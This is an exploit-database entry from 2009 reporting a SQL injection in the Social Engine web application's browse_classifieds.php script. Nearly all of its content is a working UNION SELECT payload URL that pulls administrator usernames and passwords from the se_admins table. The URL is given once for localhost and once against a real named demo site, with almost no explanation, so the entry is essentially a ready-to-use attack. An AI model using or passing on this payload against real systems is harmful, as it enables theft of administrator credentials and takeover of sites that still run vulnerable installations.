Social Engine (browse_classifieds.php s) SQL Injection Vulnerability

2009-01-11T00:00:00
ID 1337DAY-ID-4638
Type zdt
Reporter Snakespc
Modified 2009-01-11T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================================================
Social Engine (browse_classifieds.php s) SQL Injection Vulnerability
====================================================================


                  ===================================GAZA=============================================

Exploit:
http://localhost/browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+UNION%20SELECT%20concat(admin_username,0x3a,admin_password),2,3+from+se_admins
********
demo:
http://www.socialenginedev.com/browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+UNION%20SELECT%20concat(admin_username,0x3a,admin_password),2,3+from+se_admins
==================================================================================================================



#  0day.today [2018-03-13]  #